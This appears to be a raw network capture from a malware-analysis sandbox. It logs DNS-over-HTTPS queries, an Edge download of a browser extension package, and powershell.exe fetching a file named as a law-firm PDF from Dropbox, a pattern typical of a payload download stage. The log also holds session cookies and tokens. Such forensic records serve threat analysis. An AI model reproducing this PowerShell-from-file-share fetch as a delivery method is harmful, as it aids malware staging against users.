                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8eff06e1d88741c3-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d6 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      10192.168.2.749769172.64.41.34436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      11192.168.2.749772172.64.41.34436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      12192.168.2.749773162.159.61.34436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      13192.168.2.749774142.250.181.654436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 138356
                                                                                                                                                                                                                                                                                                      X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                                                                                                                                                      X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                                      Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                      Age: 3399
                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                                      ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC821INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                      Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83
                                                                                                                                                                                                                                                                                                      Data Ascii: _q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8
                                                                                                                                                                                                                                                                                                      Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26
                                                                                                                                                                                                                                                                                                      Data Ascii: 6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5
                                                                                                                                                                                                                                                                                                      Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4
                                                                                                                                                                                                                                                                                                      Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea
                                                                                                                                                                                                                                                                                                      Data Ascii: hKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98
                                                                                                                                                                                                                                                                                                      Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/message
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC1390INData Raw: 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      14192.168.2.749777162.125.69.184437976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC246OUTGET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; img-src https://* data: blob [TRUNCATED]
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Location: https://uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com/cd/0/get/CgC-FVFNHj6mqbOCsWuKDQilGp00CAeDNPmt-bZ3x8XPmIdM1Gff0PUUzgtHwNFtYvOTBVQLaPsAbb8LxWMDvSMfhwxywu7khFBduFrJ0cm3W5965j-gmYhSIWCGqvXZlz9A27yw1_Kt1KWTsiDmfIgs/file?dl=1#
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                      Set-Cookie: gvc=MzM5NDQwMTYzMjQwNjQzNDkyMzQ1NzIzNjkxNjMwNjg0Mjc4MjQz; Path=/; Expires=Sun, 09 Dec 2029 17:41:40 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: t=JjAUvAcdgi3f3aYgaxH4uDrv; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:40 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=JjAUvAcdgi3f3aYgaxH4uDrv; Path=/; Expires=Wed, 10 Dec 2025 17:41:40 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-ss=LDBkNjCa6Q; Path=/; Expires=Wed, 10 Dec 2025 17:41:40 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:40 GMT
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:40 GMT
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
